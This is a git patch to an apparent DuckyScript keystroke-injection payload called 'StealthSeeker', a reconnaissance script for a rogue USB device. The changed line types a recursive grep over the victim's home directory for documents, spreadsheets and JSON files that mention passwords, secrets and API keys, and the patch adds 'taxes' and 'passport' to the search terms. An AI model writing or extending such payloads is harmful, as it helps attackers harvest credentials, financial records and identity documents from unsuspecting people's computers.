From 20a8ac85f06cd6c0b279224613eba1af2860ce11 Mon Sep 17 00:00:00 2001 From: Narsty Date: Sat, 3 Jun 2023 01:26:39 -0500 Subject: [PATCH] Update StealthSeeker.txt --- RECON/StealthSeeker.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/RECON/StealthSeeker.txt b/RECON/StealthSeeker.txt index 06f96b0..1576846 100644 --- a/RECON/StealthSeeker.txt +++ b/RECON/StealthSeeker.txt @@ -28,7 +28,7 @@ DELAY 1000 REM Search for Passwords and Secrets STRING echo "----- Passwords and Secrets -----" ENTER -STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --exclude-dir='.git' --exclude-dir='node_modules' "password\|secret\|apikey" ~ 2>/dev/null +STRING grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --exclude-dir='.git' --exclude-dir='node_modules' "password\|secret\|apikey\|taxes\|passport" ~ 2>/dev/null ENTER DELAY 1000